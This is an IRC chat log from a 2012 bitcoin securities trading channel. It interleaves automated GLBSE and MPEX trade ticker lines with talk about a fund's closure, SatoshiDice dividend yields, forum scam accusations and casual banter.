mircea_popescu: ok, so they could get away with 3 days maybe, so 1/10th of the monthly bets, or 1/5th of the average profit. Might be enough as a scam though. Oct 02 22:31:05 I think maybe bitcoin just isnt ready for prime time yet Oct 02 22:31:15 BTC-Mining: why? Oct 02 22:31:33 It has been a big part of my life several hours a day for a year, all the people I have meet all the people that have trusted me. Felt horrible to let them all down, but I would rather cut it off now then to deterirate and become a shell of what it once was. Oct 02 22:31:40 femtotube because moar is betta Oct 02 22:32:08 "moar is betta" let me process that Oct 02 22:32:16 gigavps: no, you are wrong :) Oct 02 22:32:31 at least I can not agree Oct 02 22:32:52 lol, i am wrong at times Oct 02 22:32:54 hold on, is DeaDTerra closing the shop? Oct 02 22:33:13 femtotube: why not? Oct 02 22:33:14 OneEyed 1/10 of daily bets is the monthly profit for half a year. Oct 02 22:33:17 I am closing up Gamma Bitcoin Fund Oct 02 22:33:27 DeaDTerra jeez Oct 02 22:33:41 !pl GBF 1 Oct 02 22:33:41 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 22:33:45 there's literally nothing going to be left huh. Oct 02 22:33:47 GLBSE 404 Oct 02 22:33:49 mircea_popescu: yeah, my computations were totally out Oct 02 22:33:50 account based only. Oct 02 22:34:01 OneEyed iirc they do like 1.9% or something Oct 02 22:34:05 DeaDTerra, why close it? Oct 02 22:34:16 [GLBSE] [ASICMINER] 2 @ 0.11039988 = 0.2208 BTC [-] Oct 02 22:34:18 [GLBSE] [ASICMINER] 1 @ 0.10800001 BTC [-] Oct 02 22:34:19 [GLBSE] [ASICMINER] 5 @ 0.108 = 0.54 BTC [-] Oct 02 22:34:20 [GLBSE] [ASICMINER] 1 @ 0.106 BTC [-] Oct 02 22:34:20 BTC-Mining: it is explained here: https://bitcointalk.org/index.php?topic=74975.msg1239841;topicseen#msg1239841 Oct 02 22:34:20 Yea :8, for the communities sake I would like to keep it going, but I don't have the time to keep the quality where I want it, and I don't want to offer a shitty service. Oct 02 22:34:21 [GLBSE] [ASICMINER] 10 @ 0.105102 = 1.051 BTC [-] Oct 02 22:34:22 [GLBSE] [ASICMINER] 29 @ 0.105101 = 3.0479 BTC [-] Oct 02 22:34:23 [GLBSE] [ASICMINER] 12 @ 0.105 = 1.26 BTC [-] Oct 02 22:34:24 [GLBSE] [ASICMINER] 11 @ 0.10352448 = 1.1388 BTC [-] Oct 02 22:34:25 [GLBSE] [ASICMINER] 2 @ 0.10311 = 0.2062 BTC [-] Oct 02 22:34:25 [GLBSE] [ASICMINER] 10 @ 0.10302 = 1.0302 BTC [-] Oct 02 22:34:26 what's the symbol and IPO price you had? Oct 02 22:34:26 [GLBSE] [ASICMINER] 12 @ 0.10300101 = 1.236 BTC [-] Oct 02 22:34:26 several reasons Oct 02 22:34:27 [GLBSE] [ASICMINER] 15 @ 0.103 = 1.545 BTC [-] Oct 02 22:34:28 [GLBSE] [ASICMINER] 39 @ 0.101102 = 3.943 BTC [-] Oct 02 22:34:29 [GLBSE] [ASICMINER] 15 @ 0.101002 = 1.515 BTC [-] Oct 02 22:34:30 [GLBSE] [ASICMINER] 5 @ 0.10100006 = 0.505 BTC [-] Oct 02 22:34:31 [GLBSE] [ASICMINER] 36 @ 0.10100005 = 3.636 BTC [-] Oct 02 22:34:32 [GLBSE] [ASICMINER] 5 @ 0.10100002 = 0.505 BTC [-] Oct 02 22:34:33 [GLBSE] [ASICMINER] 20 @ 0.10100001 = 2.02 BTC [-] Oct 02 22:34:34 [GLBSE] [ASICMINER] 158 @ 0.101 = 15.958 BTC [-] Oct 02 22:34:34 [GLBSE] [ASICMINER] 6 @ 0.10031 = 0.6019 BTC [-] Oct 02 22:34:35 [GLBSE] [ASICMINER] 2 @ 0.1002 = 0.2004 BTC [-] Oct 02 22:34:36 [GLBSE] [ASICMINER] 50 @ 0.1001 = 5.005 BTC [-] Oct 02 22:34:37 [GLBSE] [ASICMINER] 7 @ 0.10007 = 0.7005 BTC [-] Oct 02 22:34:38 [GLBSE] [ASICMINER] 1 @ 0.10000002 BTC [-] Oct 02 22:34:39 [GLBSE] [ASICMINER] 5 @ 0.10000002 = 0.5 BTC [-] Oct 02 22:34:40 [GLBSE] [ASICMINER] 100 @ 0.10000002 = 10 BTC [-] Oct 02 22:34:41 [GLBSE] [ASICMINER] 35 @ 0.10000002 = 3.5 BTC [-] Oct 02 22:34:42 [GLBSE] [ASICMINER] 11 @ 0.10000002 = 1.1 BTC [-] Oct 02 22:34:43 [GLBSE] [ASICMINER] 163 @ 0.10000001 = 16.3 BTC [-] Oct 02 22:34:43 hey, BTC-Mining is buying! Oct 02 22:34:43 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [-] Oct 02 22:34:44 [GLBSE] [ASICMINER] 80 @ 0.1 = 8 BTC [-] Oct 02 22:34:46 [GLBSE] [ASICMINER] 147 @ 0.1 = 14.7 BTC [-] Oct 02 22:34:50 wtf? Oct 02 22:34:57 BTC-Mining your lucky day! You wanted ASICMINER Oct 02 22:34:59 Looks like someone dumped a lot of shares of ASICMINER Oct 02 22:34:59 why is asicminer crashing? Oct 02 22:35:06 OneEyed a lot = 30 btc worth Oct 02 22:35:19 Several reasons Oct 02 22:35:19 https://bitcointalk.org/index.php?topic=74975.msg1239841#msg1239841 Oct 02 22:35:20 .c 30*12= Oct 02 22:35:20 360 Oct 02 22:35:25 please read the full statement Oct 02 22:35:43 DeaDTerra are you also discontinuing gsdpt ? Oct 02 22:35:46 femtotube, it was not share based but account based. Oct 02 22:36:12 OK Oct 02 22:36:13 arf... but I didn't have a bid up Oct 02 22:36:13 [GLBSE] [ASICMINER] 1 @ 0.11109889 BTC [+] Oct 02 22:36:14 [GLBSE] [ASICMINER] 7 @ 0.1110989 = 0.7777 BTC [+] Oct 02 22:36:16 [GLBSE] [GSDPT] 33 @ 0.0033995 = 0.1122 BTC [+] Oct 02 22:36:30 People need to tell me where to place my bids =/ Oct 02 22:36:48 so put it up now lolz Oct 02 22:36:50 No, I do not plan to do that, I might though if SEC says it's illegal or if GLBSE goes the way of having to register everything. I am seing the BTC securities going from gray to dark gray Oct 02 22:36:58 once it turns just a hint of black I am out. Oct 02 22:37:28 yeah Oct 02 22:37:32 seems more a problem of glbse trust pushing them down than anything. Oct 02 22:37:34 its just getting ugly fast =/ Oct 02 22:37:38 Totally transparent, daily updated log books and the whole portfolio updated daily and publically open Oct 02 22:37:57 DeaDTerra: you'll probably get the question, so: will you allow people to sell their accounts (at a discount if they want out faster than is described)? Oct 02 22:38:12 how things should be run, instead of promising things you can't hold and then default Oct 02 22:38:25 Yea sure, I have nothing against that, it's a open market Oct 02 22:38:48 I want to note acount balance does not mean amount paid out. Oct 02 22:39:11 The amount paid out will be the amount of BTC you have invested/total BTC invested * bitcoins liquidated Oct 02 22:39:17 [GLBSE] [ASICMINER] 4 @ 0.10800002 = 0.432 BTC [-] Oct 02 22:39:18 Yeah, of course, and I've seen your answer to strello Oct 02 22:39:35 Good just want to make that clear so I don't end up being called a scammer or something like that. Oct 02 22:39:43 was there a saying that you buy when there is blood on the streets and sell, when everyone has a party? Or something like that? Oct 02 22:39:44 I think it will need to be stressed more, as some people will expect the exact amount Oct 02 22:40:14 [MPEX] [S.MPOE] 18300 @ 0.00036094 = 6.6052 BTC [+] Oct 02 22:40:16 [MPEX] [S.MPOE] 34100 @ 0.00036451 = 12.4298 BTC [+] Oct 02 22:41:02 okay I added a edit to explain that part. Oct 02 22:42:17 so pretty much BTC-Mining and the dutch ppls are what's left in glbse funds at any sort of standard ? Oct 02 22:43:01 dutch ppls ? The flying one? Oct 02 22:43:28 I will say though, when there's a market for it, I have enough time and people want me to I am happy to open up GBF again, but right now neither of these are true. Oct 02 22:43:33 DeaDTerra: another remark: "The logbooks will not be daily but weekly and will reflect the amount liquidated" Oct 02 22:43:45 femtotube yes, paladon and PsychoticBoy Oct 02 22:43:45 yea? Oct 02 22:43:46 DeaDTerra: how will people know what how the "expected" amount evolves? Oct 02 22:44:06 I will keep the current way of calculating NAV Oct 02 22:44:23 Ok, makes sense. This will converge towards 0 this way. Oct 02 22:44:28 so I will have a amount liquidated and that will be the liquid BTC and then I will have amount left and that will be the value of the illiquid assets Oct 02 22:44:31 [GLBSE] [FPGAMINING] 1 @ 0.40050001 BTC [-] Oct 02 22:44:33 [GLBSE] [FPGAMINING] 1 @ 0.4005 BTC [-] Oct 02 22:44:34 [GLBSE] [FPGAMINING] 1 @ 0.4003 BTC [-] Oct 02 22:44:35 [GLBSE] [FPGAMINING] 2 @ 0.4002 = 0.8004 BTC [-] Oct 02 22:45:35 And people should also realize that your way of liquidating means that they may get their current investment back, or even get more of it. Oct 02 22:45:36 DeaDTerra is there a spreadsheet ? Oct 02 22:45:45 Several Oct 02 22:45:51 so link me Oct 02 22:46:01 https://bitcointalk.org/index.php?topic=74975.msg830645#msg830645 Oct 02 22:46:08 [GLBSE] [FPGAMINING] 1 @ 0.376 BTC [-] Oct 02 22:46:15 Links to google docs: Oct 02 22:46:15 Fund assets and holdings: Oct 02 22:46:15 https://docs.google.com/spreadsheet/ccc?key=0Aq6Ug2ODt-l2dC13WldWaTBWQVNYZWRwVDgtQmhzUkE Oct 02 22:46:15 Daily updated log book: Oct 02 22:46:15 https://docs.google.com/spreadsheet/ccc?key=0Aq6Ug2ODt-l2dHBoeDFWTC10QXYwR25rRXctWUE3a3c#gid=16 Oct 02 22:46:16 List of investors and their holdings: Oct 02 22:46:16 https://docs.google.com/spreadsheet/ccc?key=0AjO5QWRR9dAHdHZJRE1WRU00RWVEcEFNT0FQWmtlYmc#gid=0 Oct 02 22:46:17 a hehe ty Oct 02 22:47:54 mircea_popescu: but the flying D is inevstinf to different GLBSE issues. So, if there is nothing left to invest, who will they be worth anything? Oct 02 22:48:17 so zip.a 180 cpa 430 rebate 780 ouch bmf 874 ouch Oct 02 22:48:20 jesus you got washed Oct 02 22:48:20 femtotube: that's also my fear. Right now they do fine, more than fine even, but if they grow, they'll have nothing to invest into Oct 02 22:48:26 btw, s.dice total issue is 20.6K BTC? Oct 02 22:48:49 Yep :( Oct 02 22:49:00 femtotube 2mn at 0.0032, 5mn at 34, 3mn at 37 Oct 02 22:49:06 tis in the contract. Oct 02 22:49:27 and at that rate they go, it will take 10 years to earn what they are taking home from IPO? no no ... Oct 02 22:49:32 I must be wrong here Oct 02 22:49:42 Okay, I am leaving now guys. Please keep a eye on the GBF thread and keep it calm and cilizied until I get back okay? :) Oct 02 22:49:46 they make about 2-5k net a month Oct 02 22:49:50 it would take them ~6 months Oct 02 22:50:14 30K BTC for 10%! and 10% from 2K is 200 Oct 02 22:50:39 So 60 months it would take... Oct 02 22:50:43 well wait. Oct 02 22:50:47 who's "them" then ? Oct 02 22:51:04 them = the s.dice guy Oct 02 22:51:07 the shares make roughly 15-20% a year on dividends, yes Oct 02 22:51:13 the s.dice GUY makes 2-5k a month Oct 02 22:51:17 no, it 10% Oct 02 22:51:17 and so it'd be ~6 months Oct 02 22:51:30 dude. he makes the whole net. he owns 9x% of the shares. Oct 02 22:51:53 he makes 2-5K but investors paid 30K for 10% Oct 02 22:52:04 seems legit Oct 02 22:52:04 right. Oct 02 22:52:11 evoorhees i like Oct 02 22:52:18 so, it takes 60 months Oct 02 22:52:18 and on that 34.5k they realise through dividends about 15-20% a year. Oct 02 22:52:19 What's the 6 month you are talking about? Oct 02 22:52:33 BTC-Mining he asked how long does the guy take to make what the shareholders paid. Oct 02 22:52:36 forget that for now Oct 02 22:52:48 or at least that's what i got. but anyway Oct 02 22:52:56 this is irrelevant and confuses the heck out of it Oct 02 22:53:01 ok, so start over. Oct 02 22:53:23 the total ipo is 30K BTC yes (give or take) Oct 02 22:53:27 [GLBSE] [OBSI.HRPT] 1 @ 0.00402001 BTC [-] Oct 02 22:53:28 [GLBSE] [OBSI.HRPT] 24 @ 0.00402 = 0.0965 BTC [-] Oct 02 22:53:36 34.5k for 10% of the shares, yes Oct 02 22:53:57 and this 34.5K BTC represents 10% of the Co? Oct 02 22:54:01 yea Oct 02 22:54:30 now, if investors get 200 BTC a month Oct 02 22:54:41 for divs Oct 02 22:54:43 they'd likely get more. 200 was half the expected yield this month Oct 02 22:54:44 it will take Oct 02 22:54:52 .c 35000/200= Oct 02 22:54:52 175 Oct 02 22:55:01 .c 175/12 Oct 02 22:55:01 14.5833333 Oct 02 22:55:06 14 years? Oct 02 22:55:10 34.5K would need then 3.45k a year in divs for 10% or 287.5 BTC per month Oct 02 22:55:28 if they make 200 btc a month in divs it will take ~15 years for the divs to accumulate to the level of their original investment. Oct 02 22:55:40 Yup Oct 02 22:55:40 they just had a div 206 for investors Oct 02 22:55:44 BTC-Mining the expected statistical yield for sept was ~420 iirc Oct 02 22:56:05 femtotube well, so thei did a 768 div month before that. Oct 02 22:56:11 mircea_popescu: correct and that what i was trying to tell you Oct 02 22:56:20 previous statement Oct 02 22:56:41 .c (768+206)/2 Oct 02 22:56:41 487 Oct 02 22:56:48 i fail to see the problem tho. dividends are a little above what is paid on nyse commonly. Oct 02 22:56:48 nex will be 150 :) Oct 02 22:56:48 so ? Oct 02 22:57:03 NYSE? you did not say NYSE Oct 02 22:57:08 yes, i did. Oct 02 22:57:14 nyse is the antiquated version of mpex. Oct 02 22:57:19 LOL Oct 02 22:57:25 some people still stick to that junk Oct 02 22:57:28 for unclear reasons. Oct 02 22:57:35 That's exactly the problem. It's not Microsoft co or whatever. It's significantly more risky. Oct 02 22:57:52 As such, getting such low dividends... Oct 02 22:57:59 to what? regulated market? Where you can not just lift your hat and say good day and walk? Oct 02 22:58:27 femtotube dood. mfglobal did EXACTLY what you claim Oct 02 22:58:37 citi, jpm, everyone. EVERYONE Oct 02 22:58:39 s.dice is a blockchain spamming web sire where pople gamble. Illegal probably too :) Oct 02 22:58:55 it's as illegal in fiat as bofa is illegal in btc. Oct 02 22:58:58 what's your point ? Oct 02 22:59:04 mircea_popescu: and how many CO's are listed in NYSE and NASDAQ? Oct 02 22:59:05 lol Oct 02 22:59:12 for how many YEARS? Oct 02 22:59:13 femtotube a bunch Oct 02 22:59:24 well obviously the obsolete version will have more years duh Oct 02 22:59:43 [GLBSE] [MOORE] 6 @ 0.5001 = 3.0006 BTC [+] Oct 02 22:59:50 is that bunch bigger, than GLBSE and all the others combined? What about daily turn over, market cap etc? Oct 02 22:59:51 in 1920 the argument that stagecoach was used for YEARS did what exactly ? cars win. Oct 02 23:00:08 actually, mpex owned the romanian stock exchange on s.dice ipo day Oct 02 23:00:14 and in general... why do i care about all that crap ? Oct 02 23:00:50 [GLBSE] [MU] 6 @ 0.19 = 1.14 BTC [+] Oct 02 23:00:52 hyperbole much? Oct 02 23:00:55 none. Oct 02 23:01:01 i'm dead serious, too. Oct 02 23:03:41 [GLBSE] [GERBITIN.PYRA] 2 @ 0.98 = 1.96 BTC [+] Oct 02 23:05:33 [MPEX] [F.GIGA.ETF] 500 @ 0.0004418 = 0.2209 BTC [-] Oct 02 23:05:50 [GLBSE] [ASICMINER] 1 @ 0.11 BTC [+] Oct 02 23:08:32 [GLBSE] [MINING] 3 @ 0.8 = 2.4 BTC [+] Oct 02 23:08:58 [GLBSE] [GSDPT] 14 @ 0.0033995 = 0.0476 BTC [+] Oct 02 23:10:42 good evening all, hows life? Oct 02 23:14:42 [GLBSE] [BITBOND] 1 @ 0.25000001 BTC [-] Oct 02 23:15:49 [GLBSE] [ASICMINER] 2 @ 0.11099889 = 0.222 BTC [+] Oct 02 23:17:16 [GLBSE] [YABMC] 1 @ 0.07499999 BTC [+] Oct 02 23:17:32 [GLBSE] [MINING] 1 @ 0.8 BTC [+] Oct 02 23:19:03 [GLBSE] [BBBB] 14 @ 0.00016 = 0.0022 BTC [+] Oct 02 23:20:24 [GLBSE] [BBBB] 181 @ 0.00016 = 0.029 BTC [+] Oct 02 23:24:23 [GLBSE] [GSDPT] 30 @ 0.0033995 = 0.102 BTC [+] Oct 02 23:28:36 [GLBSE] [ASICMINER] 1 @ 0.11 BTC [-] Oct 02 23:29:26 scam accusations sure are backing up Oct 02 23:30:26 by undertaking to protect 'the community' in the manner then failing im pretty sure theymos, maged and any other staff are making scammers of themselves Oct 02 23:30:35 [GLBSE] [BBBB] 100 @ 0.00016 = 0.016 BTC [+] Oct 02 23:30:37 [MPEX] [S.MPOE] 1400 @ 0.0003613 = 0.5058 BTC [-] Oct 02 23:30:38 [MPEX] [S.MPOE] 25594 @ 0.00036451 = 9.3293 BTC [+] Oct 02 23:30:40 [MPEX] [S.MPOE] 3969 @ 0.00036458 = 1.447 BTC [+] Oct 02 23:30:45 the scam accusation forum Oct 02 23:32:10 im just commenting that there are a large number of accusation threads that don't seem to have been actioned Oct 02 23:33:00 i like t print out forum threads as toilet paper Oct 02 23:33:10 imho bitcointalk ought be replaced by something more reddit-like Oct 02 23:33:20 my ass is much tuufff Oct 02 23:33:20 agreed Oct 02 23:33:44 yerp Oct 02 23:34:21 dub sauce ? Oct 02 23:36:43 https://bitcointalk.org/index.php?board=83.0 Oct 02 23:36:48 good idea, i should offer it on bitmit.com "Toilet paper with btctalk thread of your choice" Oct 02 23:37:10 jurov hahaha yea Oct 02 23:37:21 I once used a windows 3.x manual for toilet paper Oct 02 23:37:26 just to say I had Oct 02 23:40:13 lol Oct 02 23:40:15 i bet that would sell Oct 02 23:41:58 sorry that i don't have inkjet anymore... dunno how it would work with laser Oct 02 23:42:33 jurov: I'll take as many rolls as needed to print all of LoupGaroux, or whatever that fuckwits name is, posts Oct 02 23:43:23 .py 40/0.05 Oct 02 23:43:25 800.0 Oct 02 23:43:48 on 40m roll will fit 800 posts, if average one has 5cm Oct 02 23:44:15 dub aww you don't like loup ? Oct 02 23:44:38 no, of all the arrogant knowitall assclowns that one holds itself in teh highest regard Oct 02 23:44:57 also, everyone hates the rench Oct 02 23:45:02 french too Oct 02 23:45:37 be careful, romanians are quite close to french :) Oct 02 23:45:58 lol Oct 02 23:46:14 it's actually the french that are close to the romanians, or at least trying Oct 02 23:49:03 Bugpowder when are you gonna splurge on an irc client ? Oct 02 23:49:11 lol Oct 02 23:49:18 mirc Oct 02 23:49:40 a login script would me nice Oct 02 23:49:51 xchat, irssi etc Oct 02 23:49:59 Probably when I make some bitcoins on a trade Oct 02 23:50:21 [GLBSE] [OBSI.HRPT] 9 @ 0.004021 = 0.0362 BTC [+] Oct 02 23:51:26 lol you haven't ?! Oct 02 23:51:41 I have Oct 02 23:51:53 but I will never get out of the F.GIGA.ETF panic sell hole Oct 02 23:52:11 i bouncer would blow your mind then Bugpowder Oct 02 23:52:44 ibouncer? Oct 02 23:52:45 excuse me, i'm old. a bnc i mean Oct 02 23:53:12 a bnc cable? Oct 02 23:53:24 a bnc is an irc proxy Oct 02 23:53:32 like a private ircdthat you configure Oct 02 23:53:33 ohhh Oct 02 23:53:41 to stay connected and log Oct 02 23:53:47 lolz how old are you jcpham ? Oct 02 23:53:50 I might have used that many years ago Oct 02 23:54:08 30 something Oct 02 23:54:09 I haven't don't much on IRC since 96-01 Oct 02 23:54:39 Bugpowder me too. Oct 02 23:54:50 then btc sucked me back in Oct 02 23:55:27 I like to IRC from a bnc terminator Oct 02 23:56:04 [MPEX] [F.GIGA.ETF] 1000 @ 0.0004418 = 0.4418 BTC [-] Oct 02 23:56:05 [MPEX] [F.GIGA.ETF] 3700 @ 0.0004418 = 1.6347 BTC [-] Oct 02 23:56:06 [MPEX] [F.GIGA.ETF] 900 @ 0.0004418 = 0.3976 BTC [-] Oct 02 23:56:07 [MPEX] [F.GIGA.ETF] 2025 @ 0.0004418 = 0.8946 BTC [-] Oct 02 23:56:09 [MPEX] [S.MPOE] 40143 @ 0.00036458 = 14.6353 BTC [+] Oct 02 23:56:31 I prefer to IRC from my browser window Oct 02 23:56:37 sad Oct 02 23:57:04 packet radio would be more effective Oct 02 23:57:13 hehe i have some BNC pcmcia shit Oct 02 23:57:19 dont ask why Oct 02 23:57:24 i had some 10mbit nics too Oct 02 23:57:26 also pcmcia Oct 02 23:57:42 I've got nics, connectors, miles of cable Oct 02 23:57:56 i've got girls. Oct 02 23:58:04 girls beat nics, cable, pcmcia etc. Oct 02 23:58:22 I have 2 Watt Ti-Sapphire lasers Oct 02 23:58:43 pew pew pew Oct 03 00:00:12 I have a shitload of 1310nm lasers Oct 03 00:00:23 what can you do with those? Oct 03 00:01:01 they're in SFPs (optical transcievers) Oct 03 00:01:23 bad spot on the H20 absorbtion curve Oct 03 00:01:38 910nm is where it isat Oct 03 00:04:30 [GLBSE] [GSDPT] 1 @ 0.0033995 BTC [+] Oct 03 00:06:33 [GLBSE] [OBSI.HRPT] 1 @ 0.00690053 BTC [+] Oct 03 00:06:34 [GLBSE] [OBSI.HRPT] 20 @ 0.00690054 = 0.138 BTC [+] Oct 03 00:06:35 [GLBSE] [OBSI.HRPT] 29 @ 0.00690055 = 0.2001 BTC [+] Oct 03 00:06:43 heh Oct 03 00:07:05 all the buy back chatter sucking people in Oct 03 00:11:55 do any of you know what DMC has in it's portfolio? Oct 03 00:12:26 Diablo-D3 can tell you Oct 03 00:12:53 iirc mostly obsi and usagi Oct 03 00:15:46 [GLBSE] [BTC-MINING] 1 @ 0.94989999 BTC [+] Oct 03 00:15:47 [GLBSE] [BTC-MINING] 1 @ 0.9499 BTC [+] Oct 03 00:15:49 [GLBSE] [BTC-MINING] 5 @ 0.95 = 4.75 BTC [+] Oct 03 00:15:50 [GLBSE] [BTC-MINING] 2 @ 0.95 = 1.9 BTC [+] Oct 03 00:20:26 [GLBSE] [OBSI.HRPT] 20 @ 0.00670219 = 0.134 BTC [-] Oct 03 00:20:27 [GLBSE] [OBSI.HRPT] 325 @ 0.0067022 = 2.1782 BTC [+] Oct 03 00:20:29 [GLBSE] [OBSI.HRPT] 90 @ 0.0069 = 0.621 BTC [+] Oct 03 00:20:30 [GLBSE] [OBSI.HRPT] 65 @ 0.00690055 = 0.4485 BTC [+] Oct 03 00:20:31 [GLBSE] [OBSI.HRPT] 6 @ 0.00690059 = 0.0414 BTC [+] Oct 03 00:20:32 [GLBSE] [OBSI.HRPT] 2 @ 0.00698317 = 0.014 BTC [+] Oct 03 00:20:33 [GLBSE] [OBSI.HRPT] 2 @ 0.007 = 0.014 BTC [+] Oct 03 00:20:34 [GLBSE] [OBSI.HRPT] 176 @ 0.00705036 = 1.2409 BTC [+] Oct 03 00:21:07 [MPEX] [F.GIGA.ETF] 1500 @ 0.0004418 = 0.6627 BTC [-] Oct 03 00:31:34 [MPEX] [F.GIGA.ETF] 3222 @ 0.00044181 = 1.4235 BTC [+] Oct 03 00:31:36 [MPEX] [F.GIGA.ETF] 970 @ 0.00044182 = 0.4286 BTC [+] Oct 03 00:31:37 [MPEX] [F.GIGA.ETF] 2100 @ 0.00044182 = 0.9278 BTC [+] Oct 03 00:31:38 [MPEX] [F.GIGA.ETF] 9800 @ 0.00044182 = 4.3298 BTC [+] Oct 03 00:31:39 [MPEX] [F.GIGA.ETF] 5800 @ 0.00044182 = 2.5626 BTC [+] Oct 03 00:31:41 [MPEX] [F.GIGA.ETF] 200 @ 0.00044183 = 0.0884 BTC [+] Oct 03 00:31:42 [MPEX] [F.GIGA.ETF] 5911 @ 0.00044183 = 2.6117 BTC [+] Oct 03 00:31:43 [MPEX] [F.GIGA.ETF] 8269 @ 0.00044183 = 3.6535 BTC [+] Oct 03 00:31:44 [MPEX] [F.GIGA.ETF] 2746 @ 0.00044183 = 1.2133 BTC [+] Oct 03 00:31:44 [MPEX] [F.GIGA.ETF] 2480 @ 0.00044184 = 1.0958 BTC [+] Oct 03 00:31:45 [MPEX] [F.GIGA.ETF] 5984 @ 0.00044184 = 2.644 BTC [+] Oct 03 00:31:46 [MPEX] [F.GIGA.ETF] 4900 @ 0.00044184 = 2.165 BTC [+] Oct 03 00:31:47 [MPEX] [F.GIGA.ETF] 208 @ 0.00044185 = 0.0919 BTC [+] Oct 03 00:31:49 [MPEX] [F.GIGA.ETF] 7410 @ 0.00044186 = 3.2742 BTC [+] Oct 03 00:32:19 [MPEX] [F.GIGA.ETF] 3499 @ 0.00044186 = 1.5461 BTC [+] Oct 03 00:32:20 [MPEX] [F.GIGA.ETF] 1691 @ 0.00044186 = 0.7472 BTC [+] Oct 03 00:32:22 [MPEX] [F.GIGA.ETF] 880 @ 0.00044186 = 0.3888 BTC [+] Oct 03 00:32:23 [MPEX] [F.GIGA.ETF] 3778 @ 0.00044186 = 1.6693 BTC [+] Oct 03 00:32:24 [MPEX] [F.GIGA.ETF] 500 @ 0.00044186 = 0.2209 BTC [+] Oct 03 00:32:25 [MPEX] [F.GIGA.ETF] 5040 @ 0.00044186 = 2.227 BTC [+] Oct 03 00:32:26 [MPEX] [F.GIGA.ETF] 400 @ 0.00044186 = 0.1767 BTC [+] Oct 03 00:32:28 [MPEX] [F.GIGA.ETF] 11100 @ 0.00044186 = 4.9046 BTC [+] Oct 03 00:32:29 [MPEX] [F.GIGA.ETF] 3112 @ 0.00044186 = 1.3751 BTC [+] Oct 03 00:32:50 [MPEX] [F.GIGA.ETF] 7407 @ 0.00044186 = 3.2729 BTC [+] Oct 03 00:32:52 [MPEX] [F.GIGA.ETF] 7500 @ 0.00044187 = 3.314 BTC [+] Oct 03 00:32:53 [MPEX] [F.GIGA.ETF] 7193 @ 0.00044193 = 3.1788 BTC [+] Oct 03 00:32:54 [MPEX] [F.GIGA.ETF] 6500 @ 0.00044302 = 2.8796 BTC [+] Oct 03 00:32:55 [MPEX] [F.GIGA.ETF] 1400 @ 0.00046526 = 0.6514 BTC [+] Oct 03 00:33:48 [MPEX] [F.GIGA.ETF] 4900 @ 0.0004418 = 2.1648 BTC [-] Oct 03 00:33:50 [MPEX] [F.GIGA.ETF] 1675 @ 0.0004418 = 0.74 BTC [-] Oct 03 00:33:51 [MPEX] [F.GIGA.ETF] 6996 @ 0.0004418 = 3.0908 BTC [-] Oct 03 00:33:51 [MPEX] [F.GIGA.ETF] 8600 @ 0.00044177 = 3.7992 BTC [-] Oct 03 00:33:53 [MPEX] [F.GIGA.ETF] 2829 @ 0.00044174 = 1.2497 BTC [-] Oct 03 00:44:29 Is the Gsdpt div pretty low? I was thinking it might reach 4% a month or so, buts its quite a bit lower than that. Less than 1% Oct 03 00:48:27 Doffx: maybe thy have not enough shares to pay better div. I know, I know, this is probably a bad joke for today :) Oct 03 00:48:40 [GLBSE] [LTC-MINING] 1 @ 0.569999 BTC [+] Oct 03 00:49:07 [GLBSE] [LTC-MINING] 1 @ 0.41520001 BTC [-] Oct 03 00:49:58 Doffx, no, around 1% is pretty much what was expected Oct 03 00:54:49 [GLBSE] [GSDPT] 20 @ 0.0033995 = 0.068 BTC [+] Oct 03 00:57:36 [GLBSE] [GSDPT] 400 @ 0.0033995 = 1.3598 BTC [+] Oct 03 00:59:00 [MPEX] [S.MPOE] 10157 @ 0.00036521 = 3.7094 BTC [+] Oct 03 01:02:39 Doffx div was about .7% this month or so Oct 03 01:03:54 [MPEX] [O.BTCUSD.C100T] 850 @ 0.33091416 = 281.277 BTC [+] Oct 03 01:05:31 exit Oct 03 01:05:32 y Oct 03 01:05:45 fuck Oct 03 01:06:55 I was hoping for more but at least the stock is stable Oct 03 01:07:03 y fuck? Oct 03 01:07:50 focus fail Oct 03 01:13:02 [GLBSE] [OBSI.HRPT] 10 @ 0.0069999 = 0.07 BTC [-] Oct 03 01:23:58 [GLBSE] [NYAN.B] 1 @ 0.44999999 BTC [+] Oct 03 01:24:06 ya know mircea_popescu I'm surprised no one's tried a big short squeeze when they know someone has a big short Oct 03 01:24:20 guruvan on what ? Oct 03 01:25:13 oh anything....since people mostly have to advertise the desire to borrow shares, a short squeeze seems like it would e easy if someone thought of it Oct 03 01:25:55 wouldn't take that much on GLBSE Oct 03 01:26:13 you're thinking retail investors. Oct 03 01:26:14 oh, I'm sure THAT desire isn't lacking around here Smoovious Oct 03 01:26:19 you can't squeeze specialists. Oct 03 01:27:32 lol Oct 03 01:28:00 mircea_popescu: I've certainly seen money mangers get squeezed in the big markets....not often, but big when it happens Oct 03 01:28:29 well, the term "specialist" is a term of art. Oct 03 01:28:36 people who borrow shares on margin can be squeezed Oct 03 01:28:42 people who borrow shares on fixed time intervals can't. Oct 03 01:29:03 [MPEX] [S.MPOE] 8143 @ 0.00036102 = 2.9398 BTC [-] Oct 03 01:29:04 [MPEX] [S.MPOE] 2957 @ 0.0003653 = 1.0802 BTC [+] Oct 03 01:29:28 in practice the later is usually only available to specialists or otherwise select players. Oct 03 01:29:33 .g specialist finance Oct 03 01:29:34 mircea_popescu: http://financial-dictionary.thefreedictionary.com/Specialist Oct 03 01:29:49 hmm...good point (can't as easily.....though it could happen, but then it's a game of who ever has the most funds wins) Oct 03 01:30:02 right. Oct 03 01:36:53 [05:12:50] iirc mostly obsi and usagi Oct 03 01:36:54 nope Oct 03 01:37:09 obsi closed all of his assets, and I dont have any of usagi's stuff Oct 03 01:37:14 [05:11:51] do any of you know what DMC has in it's portfolio? Oct 03 01:37:25 1000 btcmc, 1000 asicminer, 106 btc-mining Oct 03 01:37:34 aha Oct 03 01:37:52 !ticker btc-mining Oct 03 01:37:55 !ticker btcmc Oct 03 01:37:55 [GLBSE:BTC-MINING] [Bid: 0.93100001] [Ask: 0.959033] [Spread: 0.02803299] [Last: 0.95] [24hVol: 25.44309999] [7dAvg: 0.95297324] Oct 03 01:37:58 [GLBSE:BTCMC] [Bid: 0.5] [Ask: 0.58969999] [Spread: 0.08969999] [Last: 0.45000001] [24hVol: ] [7dAvg: 0.521956] Oct 03 01:38:10 so like 1.6k or so ? Oct 03 01:39:16 mircea_popescu: I calculated it as >800 Oct 03 01:39:41 106 btc-mining is clearly 1k. Oct 03 01:40:01 ... they are 1btc each Oct 03 01:40:10 o duh Oct 03 